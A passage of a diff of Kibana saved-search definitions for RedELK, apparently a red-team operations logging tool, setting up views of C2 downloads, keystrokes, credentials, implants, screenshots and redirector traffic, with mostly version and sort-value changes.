"desc"]], "title": "RedELK - C2 Downloads", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642171874859, 212], "type": "search", "version": "1"} -{"attributes": {"columns": ["infra.attack_scenario", "host.name", "user.name", "c2.message", "keystrokes.url"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"lucene\"},\"filter\":[{\"meta\":{\"negate\":false,\"disabled\":false,\"alias\":null,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"keystrokes\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match\":{\"c2.log.type\":{\"query\":\"keystrokes\",\"type\":\"phrase\"}}},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 Keystrokes", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "3afbdbc0-b6aa-11e8-bc1a-cf8fa3255855", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642171874859, 215], "type": "search", "version": "1"} -{"attributes": {"columns": ["creds.realm", "creds.username", "creds.credential", "creds.host", "creds.source"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"language\":\"lucene\",\"query\":\"\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 Credentials", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "3fabe620-6c38-11ea-97d6-55783aed877a", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "credentials", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642171874859, 217], "type": "search", "version": "1"} -{"attributes": {"columns": ["infra.attack_scenario", "user.name", "host.name", "ioc.type", "file.hash.md5", "file.name", "file.size", "ioc.domain"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"lucene\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"meta\":{\"negate\":false,\"disabled\":false,\"alias\":null,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"ioc\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match\":{\"c2.log.type\":{\"query\":\"ioc\",\"type\":\"phrase\"}}},\"$state\":{\"store\":\"appState\"}}]}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 IOCs", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642171874859, 220], "type": "search", "version": "1"} -{"attributes": {"columns": ["module.name", "module.type", "module.last_run.timestamp", "module.last_run.status", "module.last_run.count", "module.last_run.message"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[{\"meta\":{\"alias\":null,\"negate\":false,\"disabled\":false,\"type\":\"exists\",\"key\":\"module.name\",\"value\":\"exists\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"exists\":{\"field\":\"module.name\"},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [], "title": "RedELK - Modules status", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "654f76a0-9269-11eb-a753-9da683898c26", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "b5972620-2b72-11eb-85d7-bbc5b6917d13", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "b5972620-2b72-11eb-85d7-bbc5b6917d13", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642171874859, 223], "type": "search", "version": "1"} -{"attributes": {"columns": ["infra.attack_scenario", "redir.backend.name", "source.ip", "source.domain", "source.geo.as.organization.name", "source.geo.country_iso_code", "http.request.body.content"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"tags:alarm_*\",\"language\":\"lucene\"},\"filter\":[],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - Redirector Traffic - Alarmed", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "658d7180-d4e1-11ea-9301-a30a04251ae9", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642171874859, 225], "type": "search", "version": "1"} -{"attributes": {"columns": ["implant.id", "infra.attack_scenario", "host.name", "user.name", "host.ip_int", "host.ip_ext", "implant.arch", "host.os.name", "host.os.version", "host.os.kernel", "implant.parent_id", "host.geo.as.organization.name", "host.geo.country_iso_code"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 implants overview", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "implantsdb", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642171874859, 227], "type": "search", "version": "1"} -{"attributes": {"columns": ["iplist.name", "iplist.source", "iplist.ip"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [], "title": "RedELK - IP Lists", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "87530b40-9269-11eb-a753-9da683898c26", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "789bb360-2ab1-11eb-bc47-53169c986c81", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642171874859, 229], "type": "search", "version": "1"} -{"attributes": {"columns": ["bluechecktype", "message"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\n \"highlightAll\": true,\n \"version\": true,\n \"query\": {\n \"language\": \"kuery\",\n \"query\": \"\"\n },\n \"indexRefName\": \"kibanaSavedObjectMeta.searchSourceJSON.index\",\n \"filter\": []\n}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - BlueCheck", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "a4757c90-ce50-11ea-a580-918d4757c08d", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "bluecheck", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1643015939090, 281], "type": "search", "version": "1"} -{"attributes": {"columns": ["attackscenario", "from", "to", "subject", "emailfolder"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "sort": [], "title": "RedELK - Emails", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "c1fca0d0-d171-11ea-8ac3-bfcfabda2250", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "email", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642171874859, 231], "type": "search", "version": "1"} -{"attributes": {"columns": ["user.name", "host.name", "c2.message", "threat.technique.id"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"meta\":{\"alias\":null,\"negate\":false,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"implant_task\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"implant_task\"}},\"$state\":{\"store\":\"appState\"}}]}"}, "sort": [], "title": "RedELK - C2 Tasks", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "cc523820-d021-11ea-9301-a30a04251ae9", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642171874859, 234], "type": "search", "version": "1"} -{"attributes": {"columns": ["c2.message", "host.name", "user.name", "implant.id"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"meta\":{\"alias\":null,\"negate\":false,\"disabled\":false,\"type\":\"phrase\",\"key\":\"event.module\",\"params\":{\"query\":\"redelk\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"event.module\":\"redelk\"}},\"$state\":{\"store\":\"appState\"}}]}"}, "sort": [], "title": "RedELK - Signals", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "195a3f00-d04f-11ea-9301-a30a04251ae9", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "195a3f00-d04f-11ea-9301-a30a04251ae9", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642171874859, 237], "type": "search", "version": "1"} -{"attributes": {"columns": ["infra.attack_scenario", "host.name", "user.name", "screenshot.full", "screenshot.thumb"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"lucene\"},\"filter\":[{\"meta\":{\"alias\":null,\"negate\":false,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"screenshots\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"screenshots\"}},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 Screenshots", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642171874859, 240], "type": "search", "version": "1"} \ No newline at end of file +{"attributes": {"columns": ["infra.attack_scenario", "agent.hostname", "redir.backend.name", "source.ip", "source.domain", "source.as.organization.name", "http.request.body.content"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"language\":\"lucene\",\"query\":\"\"},\"filter\":[],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - _Redirector Traffic", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642152855820, 2152], "type": "search", "version": "1"} +{"attributes": {"columns": ["infra.attack_scenario", "user.name", "host.name", "ioc.type", "file.hash.md5", "file.name", "file.size", "ioc.domain"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"tags:alarm_*\",\"language\":\"lucene\"},\"filter\":[{\"meta\":{\"negate\":false,\"disabled\":false,\"alias\":null,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"ioc\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match\":{\"c2.log.type\":{\"query\":\"ioc\",\"type\":\"phrase\"}}},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 IOCs - Alarmed", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "10da2290-d4e2-11ea-9301-a30a04251ae9", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642152855820, 2155], "type": "search", "version": "1"} +{"attributes": {"columns": ["infra.attack_scenario", "user.name", "host.name", "c2.message"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"events\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"events\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"events_joinleave\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"events_joinleave\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"credentials\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"credentials\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"keystrokes\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[3].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"keystrokes\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"downloads\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[4].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"downloads\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"screenshots\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[5].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"screenshots\"}},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - _Red Team Operations", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "1c580960-b6a9-11e8-bc1a-cf8fa3255855", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[3].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[4].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[5].meta.index", "type": "index-pattern"}], "sort": [1642152855820, 2163], "type": "search", "version": "1"} +{"attributes": {"columns": ["infra.attack_scenario", "host.name", "user.name", "file.directory", "file.name", "file.url"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"lucene\"},\"filter\":[{\"meta\":{\"negate\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"value\":\"downloads\",\"params\":{\"query\":\"downloads\",\"type\":\"phrase\"},\"disabled\":false,\"alias\":null,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match\":{\"c2.log.type\":{\"query\":\"downloads\",\"type\":\"phrase\"}}},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 Downloads", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642152855820, 2166], "type": "search", "version": "1"} +{"attributes": {"columns": ["infra.attack_scenario", "host.name", "user.name", "c2.message", "keystrokes.url"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"lucene\"},\"filter\":[{\"meta\":{\"negate\":false,\"disabled\":false,\"alias\":null,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"keystrokes\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match\":{\"c2.log.type\":{\"query\":\"keystrokes\",\"type\":\"phrase\"}}},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 Keystrokes", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "3afbdbc0-b6aa-11e8-bc1a-cf8fa3255855", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642152855820, 2169], "type": "search", "version": "1"} +{"attributes": {"columns": ["creds.realm", "creds.username", "creds.credential", "creds.host", "creds.source"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"language\":\"lucene\",\"query\":\"\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 Credentials", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "3fabe620-6c38-11ea-97d6-55783aed877a", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "credentials", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642152855820, 2171], "type": "search", "version": "1"} +{"attributes": {"columns": ["infra.attack_scenario", "user.name", "host.name", "ioc.type", "file.hash.md5", "file.name", "file.size", "ioc.domain"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"lucene\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"meta\":{\"negate\":false,\"disabled\":false,\"alias\":null,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"ioc\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match\":{\"c2.log.type\":{\"query\":\"ioc\",\"type\":\"phrase\"}}},\"$state\":{\"store\":\"appState\"}}]}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 IOCs", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642152855820, 2174], "type": "search", "version": "1"} +{"attributes": {"columns": ["module.name", "module.type", "module.last_run.timestamp", "module.last_run.status", "module.last_run.count", "module.last_run.message"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[{\"meta\":{\"alias\":null,\"negate\":false,\"disabled\":false,\"type\":\"exists\",\"key\":\"module.name\",\"value\":\"exists\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"exists\":{\"field\":\"module.name\"},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [], "title": "RedELK - Modules status", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "654f76a0-9269-11eb-a753-9da683898c26", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "b5972620-2b72-11eb-85d7-bbc5b6917d13", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "b5972620-2b72-11eb-85d7-bbc5b6917d13", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642152855820, 2177], "type": "search", "version": "1"} +{"attributes": {"columns": ["infra.attack_scenario", "redir.backend.name", "source.ip", "source.domain", "source.geo.as.organization.name", "source.geo.country_iso_code", "http.request.body.content"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"tags:alarm_*\",\"language\":\"lucene\"},\"filter\":[],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - Redirector Traffic - Alarmed", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "658d7180-d4e1-11ea-9301-a30a04251ae9", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642152855820, 2179], "type": "search", "version": "1"} +{"attributes": {"columns": ["implant.id", "infra.attack_scenario", "host.name", "user.name", "host.ip_int", "host.ip_ext", "implant.arch", "host.os.name", "host.os.version", "host.os.kernel", "implant.parent_id", "host.geo.as.organization.name", "host.geo.country_iso_code"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 implants overview", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "implantsdb", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642152855820, 2181], "type": "search", "version": "1"} +{"attributes": {"columns": ["iplist.name", "iplist.source", "iplist.ip"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [], "title": "RedELK - IP Lists", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "87530b40-9269-11eb-a753-9da683898c26", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "789bb360-2ab1-11eb-bc47-53169c986c81", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642152855820, 2183], "type": "search", "version": "1"} +{"attributes": {"columns": ["bluechecktype", "message"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - BlueCheck", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "a4757c90-ce50-11ea-a580-918d4757c08d", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "bluecheck", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642152855820, 2185], "type": "search", "version": "1"} +{"attributes": {"columns": ["attackscenario", "from", "to", "subject", "emailfolder"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "sort": [], "title": "RedELK - Emails", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "c1fca0d0-d171-11ea-8ac3-bfcfabda2250", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "email", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642152855820, 2187], "type": "search", "version": "1"} +{"attributes": {"columns": ["user.name", "host.name", "c2.message", "threat.technique.id"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"meta\":{\"alias\":null,\"negate\":false,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"implant_task\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"implant_task\"}},\"$state\":{\"store\":\"appState\"}}]}"}, "sort": [], "title": "RedELK - C2 Tasks", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "cc523820-d021-11ea-9301-a30a04251ae9", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642152855820, 2190], "type": "search", "version": "1"} +{"attributes": {"columns": ["c2.message", "host.name", "user.name", "implant.id"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": 